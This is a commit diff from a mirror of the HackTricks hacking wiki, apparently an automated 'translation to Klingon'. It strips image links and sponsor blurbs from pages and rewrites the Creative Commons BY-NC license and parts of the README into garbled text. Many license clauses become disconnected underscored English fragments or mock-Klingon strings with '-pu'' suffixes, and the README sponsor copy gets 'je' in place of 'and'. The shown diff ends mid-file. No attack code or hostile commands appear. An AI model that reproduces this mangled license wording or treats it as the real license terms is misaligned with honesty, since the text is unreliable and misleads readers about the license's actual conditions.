mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-14 08:57:55 +00:00
Translated to Klingon
This commit is contained in:
parent
116e3864db
commit
b442ae90c4
708 changed files with 138327 additions and 41193 deletions
6
.github/pull_request_template.md
vendored
6
.github/pull_request_template.md
vendored
File diff suppressed because one or more lines are too long
|
@ -24,30 +24,4 @@ dht udp "DHT Nodes"
|
|||
|
||||
![](<.gitbook/assets/image (273).png>)
|
||||
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
|
||||
|
||||
InfluxDB
|
||||
|
||||
![](<.gitbook/assets/image (337).png>)
|
||||
|
||||
![](<.gitbook/assets/image (338).png>)
|
||||
|
||||
![](<.gitbook/assets/image (339).png>)
|
||||
|
||||
![](<.gitbook/assets/image (340).png>)
|
||||
|
||||
![](<.gitbook/assets/image (341).png>)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1)
|
||||
|
|
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -19,7 +17,7 @@ Other ways to support HackTricks:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -30,5 +28,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
115
LICENSE.md
115
LICENSE.md
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -65,128 +63,123 @@ j. __Share__ means to provide material to the public by any means or process tha
|
|||
k. __Sui Generis Database Rights__ means rights other than copyright resulting from Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as well as other essentially equivalent rights anywhere in the world.
|
||||
|
||||
l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning.
|
||||
|
||||
## Section 2 – Scope.
|
||||
|
||||
a. ___License grant.___
|
||||
a. ___QaDwI'.___
|
||||
|
||||
1. Subject to the terms and conditions of this Public License, the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive, irrevocable license to exercise the Licensed Rights in the Licensed Material to:
|
||||
1. ___QaDwI'___, ___Public License___ je ___terms and conditions___, ___Licensor___ ___You___ ___worldwide___, ___royalty-free___, ___non-sublicensable___, ___non-exclusive___, ___irrevocable license___ ___Licensed Rights___ ___Licensed Material___ ___exercise___:
|
||||
|
||||
A. reproduce and Share the Licensed Material, in whole or in part, for NonCommercial purposes only; and
|
||||
A. ___reproduce and Share___ ___Licensed Material___, ___whole or in part___, ___NonCommercial purposes___; ___and___
|
||||
|
||||
B. produce, reproduce, and Share Adapted Material for NonCommercial purposes only.
|
||||
B. ___produce, reproduce, and Share___ ___Adapted Material___ ___NonCommercial purposes___.
|
||||
|
||||
2. __Exceptions and Limitations.__ For the avoidance of doubt, where Exceptions and Limitations apply to Your use, this Public License does not apply, and You do not need to comply with its terms and conditions.
|
||||
|
||||
3. __Term.__ The term of this Public License is specified in Section 6(a).
|
||||
2. ___Exceptions and Limitations.___ ___Exceptions and Limitations___ ___Your use___, ___Public License___ ___apply___, ___Public License___ ___apply___, ___You___ ___need to comply___ ___terms and conditions___.
|
||||
|
||||
4. __Media and formats; technical modifications allowed.__ The Licensor authorizes You to exercise the Licensed Rights in all media and formats whether now known or hereafter created, and to make technical modifications necessary to do so. The Licensor waives and/or agrees not to assert any right or authority to forbid You from making technical modifications necessary to exercise the Licensed Rights, including technical modifications necessary to circumvent Effective Technological Measures. For purposes of this Public License, simply making modifications authorized by this Section 2(a)(4) never produces Adapted Material.
|
||||
|
||||
5. __Downstream recipients.__
|
||||
3. ___Term.___ ___Public License___ ___term___ ___specified___ ___Section 6(a)___.
|
||||
|
||||
A. __Offer from the Licensor – Licensed Material.__ Every recipient of the Licensed Material automatically receives an offer from the Licensor to exercise the Licensed Rights under the terms and conditions of this Public License.
|
||||
4. ___Media and formats; technical modifications allowed.___ ___Licensor___ ___exercise___ ___Licensed Rights___ ___media and formats___ ___now known___ ___hereafter created___, ___technical modifications___ ___necessary___ ___Licensor___ ___waives___ ___assert___ ___right___ ___authority___ ___forbid___ ___technical modifications___ ___necessary___ ___exercise___ ___Licensed Rights___, ___including technical modifications___ ___necessary___ ___circumvent Effective Technological Measures___. ___Public License___, ___simply making modifications authorized___ ___Section 2(a)(4)___ ___never produces Adapted Material___.
|
||||
|
||||
B. __No downstream restrictions.__ You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, the Licensed Material if doing so restricts exercise of the Licensed Rights by any recipient of the Licensed Material.
|
||||
5. ___Downstream recipients.___
|
||||
|
||||
A. ___Offer from the Licensor – Licensed Material.___ ___recipient___ ___Licensed Material___ ___automatically receives___ ___offer___ ___Licensor___ ___exercise___ ___Licensed Rights___ ___terms and conditions___ ___Public License___.
|
||||
|
||||
B. ___No downstream restrictions.___ ___You___ ___offer___ ___impose___ ___additional___ ___different terms___ ___conditions___, ___apply___ ___Effective Technological Measures___, ___Licensed Material___ ___restricts exercise___ ___Licensed Rights___ ___recipient___ ___Licensed Material___.
|
||||
|
||||
6. ___No endorsement.___ ___Nothing___ ___Public License___ ___constitutes___ ___may be construed___ ___permission___ ___assert___ ___imply___ ___You___, ___Your use___ ___Licensed Material___, ___connected with___, ___sponsored___, ___endorsed___, ___granted official status___, ___Licensor___ ___others designated___ ___receive attribution___ ___provided___ ___Section 3(a)(1)(A)(i)___.
|
||||
|
||||
6. __No endorsement.__ Nothing in this Public License constitutes or may be construed as permission to assert or imply that You are, or that Your use of the Licensed Material is, connected with, or sponsored, endorsed, or granted official status by, the Licensor or others designated to receive attribution as provided in Section 3(a)(1)(A)(i).
|
||||
|
||||
b. ___Other rights.___
|
||||
|
||||
1. Moral rights, such as the right of integrity, are not licensed under this Public License, nor are publicity, privacy, and/or other similar personality rights; however, to the extent possible, the Licensor waives and/or agrees not to assert any such rights held by the Licensor to the limited extent necessary to allow You to exercise the Licensed Rights, but not otherwise.
|
||||
1. ___Moral rights___, ___right of integrity___, ___licensed___ ___Public License___, ___publicity___, ___privacy___, ___and/or other similar personality rights___; ___however___, ___extent possible___, ___Licensor___ ___waives___ ___assert___ ___rights___ ___held___ ___Licensor___ ___limited extent necessary___ ___allow You___ ___exercise___ ___Licensed Rights___, ___otherwise___.
|
||||
|
||||
2. Patent and trademark rights are not licensed under this Public License.
|
||||
2. ___Patent and trademark rights___ ___licensed___ ___Public License___.
|
||||
|
||||
3. ___extent possible___, ___Licensor___ ___waives___ ___right___ ___collect royalties___ ___You___ ___exercise___ ___Licensed Rights___, ___directly___ ___collecting society___ ___voluntary___ ___waivable statutory___ ___compulsory licensing scheme___. ___cases___ ___Licensor___ ___expressly reserves___ ___right___ ___collect___ ___royalties___, ___Licensed Material___ ___used___ ___NonCommercial purposes___.
|
||||
|
||||
3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes.
|
||||
|
||||
## Section 3 – License Conditions.
|
||||
|
||||
Your exercise of the Licensed Rights is expressly made subject to the following conditions.
|
||||
___Your exercise___ ___Licensed Rights___ ___expressly made subject___ ___following conditions___.
|
||||
|
||||
a. ___Attribution.___
|
||||
|
||||
1. If You Share the Licensed Material (including in modified form), You must:
|
||||
1. ___If You Share___ ___Licensed Material___ (___including in modified form___), ___You___:
|
||||
|
||||
A. retain the following if it is supplied by the Licensor with the Licensed Material:
|
||||
A. ___retain___ ___following___ ___supplied___ ___Licensor___ ___Licensed Material___:
|
||||
|
||||
i. identification of the creator(s) of the Licensed Material and any others designated to receive attribution, in any reasonable manner requested by the Licensor (including by pseudonym if designated);
|
||||
i. ___identification___ ___creator(s)___ ___Licensed Material___ ___others designated___ ___receive attribution___, ___reasonable manner requested___ ___Licensor___ (___including by pseudonym___ ___designated___);
|
||||
|
||||
ii. a copyright notice;
|
||||
ii. ___copyright notice___;
|
||||
|
||||
iii. a notice that refers to this Public License;
|
||||
iii. ___notice___ ___refers___ ___Public License___;
|
||||
|
||||
iv. a notice that refers to the disclaimer of warranties;
|
||||
iv. ___notice___ ___refers___ ___disclaimer of warranties___;
|
||||
|
||||
v. a URI or hyperlink to the Licensed Material to the extent reasonably practicable;
|
||||
v. ___URI or hyperlink___ ___Licensed Material___ ___extent reasonably practicable___;
|
||||
|
||||
B. indicate if You modified the Licensed Material and retain an indication of any previous modifications; and
|
||||
B. ___indicate___ ___You modified___ ___Licensed Material___ ___retain___ ___indication___ ___previous modifications___; ___and___
|
||||
|
||||
C. indicate the Licensed Material is licensed under this Public License, and include the text of, or the URI or hyperlink to, this Public License.
|
||||
C. ___indicate___ ___Licensed Material___ ___licensed___ ___Public License___, ___include___ ___text___, ___URI or hyperlink___, ___Public License___.
|
||||
|
||||
2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner based on the medium, means, and context in which You Share the Licensed Material. For example, it may be reasonable to satisfy the conditions by providing a URI or hyperlink to a resource that includes the required information.
|
||||
2. ___You___ ___satisfy___ ___conditions___ ___Section 3(a)(1)___ ___reasonable manner___ ___medium, means, and context___ ___You Share___ ___Licensed Material___. ___example___, ___reasonable___ ___satisfy___ ___conditions___ ___providing___ ___URI or hyperlink___ ___resource___ ___includes___ ___required information___.
|
||||
|
||||
3. If requested by the Licensor, You must remove any of the information required by Section 3(a)(1)(A) to the extent reasonably practicable.
|
||||
3. ___If requested___ ___Licensor___, ___You___ ___remove___ ___information___ ___required___ ___Section 3(a)(1)(A)___ ___extent reasonably practicable___.
|
||||
|
||||
4. If You Share Adapted Material You produce, the Adapter's License You apply must not prevent recipients of the Adapted Material from complying with this Public License.
|
||||
4. ___If You Share___ ___Adapted Material___ ___produce___, ___Adapter's License___ ___apply___ ___prevent recipients___ ___Adapted Material___ ___comply___ ___Public License___.
|
||||
|
||||
## Section 4 – Sui Generis Database Rights.
|
||||
|
||||
Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material:
|
||||
___Licensed Rights___ ___Sui Generis Database Rights___ ___apply___ ___Your use___ ___Licensed Material___:
|
||||
|
||||
a. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, reuse, reproduce, and Share all or a substantial portion of the contents of the database for NonCommercial purposes only;
|
||||
a. ___avoidance of doubt___, ___Section 2(a)(1)___ ___grants You___ ___right___ ___extract, reuse, reproduce, and Share___ ___substantial portion___ ___contents___ ___database___ ___NonCommercial purposes___;
|
||||
|
||||
b. if You include all or a substantial portion of the database contents in a database in which You have Sui Generis Database Rights, then the database in which You have Sui Generis Database Rights (but not its individual contents) is Adapted Material; and
|
||||
b. ___You___ ___include___ ___substantial portion___ ___database contents___ ___database___ ___Sui Generis Database Rights___, ___database___ ___Sui Generis Database Rights___ (___not its individual contents___) ___Adapted Material___; ___and___
|
||||
|
||||
c. You must comply with the conditions in Section 3(a) if You Share all or a substantial portion of the contents of the database.
|
||||
c. ___You___ ___comply___ ___conditions___ ___Section 3(a)___ ___You Share___ ___substantial portion___ ___contents___ ___database___.
|
||||
|
||||
For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights.
|
||||
___avoidance of doubt___, ___Section 4___ ___supplements___ ___replace___ ___Your obligations___ ___Public License___ ___Licensed Rights___ ___include___ ___Copyright and Similar Rights___.
|
||||
|
||||
## Section 5 – Disclaimer of Warranties and Limitation of Liability.
|
||||
|
||||
a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__
|
||||
a. ___Unless otherwise separately undertaken___ ___Licensor___, ___extent possible___, ___Licensor___ ___offers___ ___Licensed Material___ ___as-is and as-available___, ___makes no representations or warranties___ ___kind___ ___Licensed Material___, ___express, implied, statutory___, ___other___. ___includes___, ___without limitation___, ___warranties___ ___title___, ___merchantability___, ___fitness for a particular purpose___, ___non-infringement___, ___absence of latent or other defects___, ___accuracy___, ___presence or absence___ ___errors___, ___known___ ___discoverable___. ___disclaimers___ ___warranties___ ___allowed___ ___full or in part___, ___disclaimer___ ___may not apply___ ___You___.
|
||||
|
||||
b. __To the extent possible, in no event will the Licensor be liable to You on any legal theory (including, without limitation, negligence) or otherwise for any direct, special, indirect, incidental, consequential, punitive, exemplary, or other losses, costs, expenses, or damages arising out of this Public License or use of the Licensed Material, even if the Licensor has been advised of the possibility of such losses, costs, expenses, or damages. Where a limitation of liability is not allowed in full or in part, this limitation may not apply to You.__
|
||||
b. ___extent possible___, ___no event___ ___Licensor___ ___liable___ ___You___ ___legal theory___ (___including, without limitation___, ___negligence___) ___otherwise___ ___direct, special, indirect, incidental, consequential, punitive, exemplary___, ___other losses___, ___costs, expenses, or damages___ ___Public License___ ___use___ ___Licensed Material___, ___Licensor___ ___advised___ ___possibility___ ___losses, costs, expenses, or damages___. ___limitation of liability___ ___allowed___ ___full or in part___, ___limitation___ ___may not apply___ ___You___.
|
||||
|
||||
c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability.
|
||||
c. ___disclaimer___ ___warranties___ ___limitation of liability___ ___provided above___ ___interpreted___ ___manner___, ___extent possible___, ___most closely approximates___ ___absolute disclaimer___ ___waiver___ ___all liability___.
|
||||
|
||||
## Section 6 – Term and Termination.
|
||||
|
||||
a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically.
|
||||
a. ___Public License___ ___applies___ ___term___ ___Copyright and Similar Rights___ ___licensed___ ___here___. ___You___ ___fail to comply___ ___Public License___, ___Your rights___ ___Public License___ ___terminate automatically___.
|
||||
|
||||
b. Where Your right to use the Licensed Material has terminated under Section 6(a), it reinstates:
|
||||
b. ___Your right___ ___use___ ___Licensed Material___ ___terminated___ ___Section 6(a)___, ___reinstates___:
|
||||
|
||||
1. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or
|
||||
1. ___automatically___ ___date___ ___violation___ ___cured___, ___provided___ ___cured___ ___30 days___ ___Your discovery___ ___violation___; ___or___
|
||||
|
||||
2. upon express reinstatement by the Licensor.
|
||||
2. ___express reinstatement___ ___Licensor___.
|
||||
|
||||
For the avoidance of doubt, this Section 6(b) does not affect any right the Licensor may have to seek remedies for Your violations of this Public License.
|
||||
___avoidance of doubt___, ___Section 6(b)___ ___affect___ ___right___ ___Licensor___ ___may have___ ___seek remedies___ ___Your violations___ ___Public License___.
|
||||
|
||||
c. For the avoidance of doubt, the Licensor may also offer the Licensed Material under separate terms or conditions or stop distributing the Licensed Material at any time; however, doing so will not terminate this Public License.
|
||||
|
||||
d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.
|
||||
c. ___avoidance of doubt___, ___Licensor___ ___offer___ ___Licensed Material___ ___separate terms___ ___conditions___ ___stop distributing___ ___Licensed Material___ ___any time___; ___however___, ___doing so___ ___terminate___ ___Public License___.
|
||||
|
||||
d. ___Sections 1, 5, 6, 7, and 8___ ___survive termination___ ___Public License___.
|
||||
## Section 7 – Other Terms and Conditions.
|
||||
|
||||
a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed.
|
||||
a. **Licensor** jatlhbe'chugh **You**-pu' jatlhbe'chugh **additional** je **different** tayqeq **terms** je **conditions**-pu' **bound** vItlhutlh.
|
||||
|
||||
b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License.
|
||||
b. **Licensed Material**-pu' **arrangements**, **understandings**, je **agreements**-pu' **stated**-pu' **separate** je **independent** **terms** je **conditions**-pu' **Public License**-pu' **not**-pu' **related**.
|
||||
|
||||
## Section 8 – Interpretation.
|
||||
|
||||
a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License.
|
||||
a. **Avoidance**-pu' **doubt**-pu', **Public License**-pu' **not**-pu' **reduce**, **limit**, **restrict**, je **impose conditions**-pu' **Licensed Material**-pu' **use**-pu' **lawfully** **made**-pu' **permission**-pu' **Public License**-pu' **without**-pu'.
|
||||
|
||||
b. To the extent possible, if any provision of this Public License is deemed unenforceable, it shall be automatically reformed to the minimum extent necessary to make it enforceable. If the provision cannot be reformed, it shall be severed from this Public License without affecting the enforceability of the remaining terms and conditions.
|
||||
b. **Possible**-pu', **Public License**-pu' **provision**-pu' **unenforceable** **deemed**, **automatically reformed**-pu' **minimum extent necessary** **make**-pu' **enforceable**. **Provision**-pu' **reformed** **possible**, **severed**-pu' **Public License**-pu' **remaining terms** je **conditions**-pu' **enforceability**-pu' **affecting**.
|
||||
|
||||
c. No term or condition of this Public License will be waived and no failure to comply consented to unless expressly agreed to by the Licensor.
|
||||
|
||||
d. Nothing in this Public License constitutes or may be interpreted as a limitation upon, or waiver of, any privileges and immunities that apply to the Licensor or You, including from the legal processes of any jurisdiction or authority.
|
||||
c. **Term** je **condition**-pu' **Public License**-pu' **waived**-pu' je **failure** **comply consented**-pu' **not**-pu' **expressly agreed**-pu'.
|
||||
|
||||
d. **Nothing**-pu' **Public License**-pu' **constitutes** je **interpreted**-pu' **limitation upon**, je **waiver**-pu' **privileges** je **immunities**-pu' **apply**-pu' **Licensor** je **You**-pu', **including**-pu' **legal processes**-pu' **jurisdiction** je **authority**-pu'.
|
||||
```
|
||||
Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
|
||||
Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
|
||||
|
||||
Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/).
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -200,5 +193,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
35
README.md
35
README.md
|
@ -5,7 +5,7 @@
|
|||
_Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
|
||||
|
||||
{% hint style="success" %}
|
||||
**Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.**
|
||||
**Qapla'! Qa'vamDI' wiki vItlhutlh Hoch hacking trick/technique/whatever jatlh CTFs, real life apps, reading researches, je news.**
|
||||
{% endhint %}
|
||||
|
||||
To get started follow this page where you will find the **typical flow** that **you should follow when pentesting** one or more **machines:**
|
||||
|
@ -24,7 +24,7 @@ _Your company could be here._
|
|||
|
||||
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams and training.
|
||||
[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams je training.
|
||||
|
||||
You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
|
||||
|
||||
|
@ -34,7 +34,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
|
|||
|
||||
<figure><img src=".gitbook/assets/image (4) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||||
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** je one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology je cybersecurity professionals in every discipline.
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
|
@ -42,9 +42,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
|
|||
|
||||
<figure><img src=".gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
|
||||
**Intigriti** is the **Europe's #1** ethical hacking je **bug bounty platform.**
|
||||
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, je start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
|
@ -53,7 +53,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
|
|||
<figure><img src=".gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build je **automate workflows** powered by the world's **most advanced** community tools.
|
||||
|
||||
Get Access Today:
|
||||
|
||||
|
@ -65,11 +65,11 @@ Get Access Today:
|
|||
|
||||
Stay a step ahead in the cybersecurity game.
|
||||
|
||||
[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) makes vulnerability management easy. Keep track of your attack surface, see where your company is vulnerable, and prioritize issues that leave your systems most exposed so you can focus on what matters most.
|
||||
[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) makes vulnerability management easy. Keep track of your attack surface, see where your company is vulnerable, je prioritize issues that leave your systems most exposed so you can focus on what matters most.
|
||||
|
||||
Run thousands of checks with a single platform that covers your entire tech stack from internal infrastructure to web apps, APIs and cloud systems. Integrate seamlessly with [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) and streamline DevOps so your team can implement fixes faster.
|
||||
Run thousands of checks with a single platform that covers your entire tech stack from internal infrastructure to web apps, APIs je cloud systems. Integrate seamlessly with [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) je streamline DevOps so your team can implement fixes faster.
|
||||
|
||||
Intruder never rests. Round-the-clock protection monitors your systems 24/7. Want to learn more? Visit their site and take it for a spin with [**a free trial**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
|
||||
Intruder never rests. Round-the-clock protection monitors your systems 24/7. Want to learn more? Visit their site je take it for a spin with [**a free trial**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
|
@ -77,18 +77,18 @@ Intruder never rests. Round-the-clock protection monitors your systems 24/7. Wan
|
|||
|
||||
<figure><img src=".gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
|
||||
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers je bug bounty hunters!
|
||||
|
||||
**Hacking Insights**\
|
||||
Engage with content that delves into the thrill and challenges of hacking
|
||||
Engage with content that delves into the thrill je challenges of hacking
|
||||
|
||||
**Real-Time Hack News**\
|
||||
Keep up-to-date with fast-paced hacking world through real-time news and insights
|
||||
Keep up-to-date with fast-paced hacking world through real-time news je insights
|
||||
|
||||
**Latest Announcements**\
|
||||
Stay informed with the newest bug bounties launching and crucial platform updates
|
||||
Stay informed with the newest bug bounties launching je crucial platform updates
|
||||
|
||||
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
|
||||
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) je start collaborating with top hackers today!
|
||||
|
||||
***
|
||||
|
||||
|
@ -96,7 +96,7 @@ Stay informed with the newest bug bounties launching and crucial platform update
|
|||
|
||||
<figure><img src=".gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||
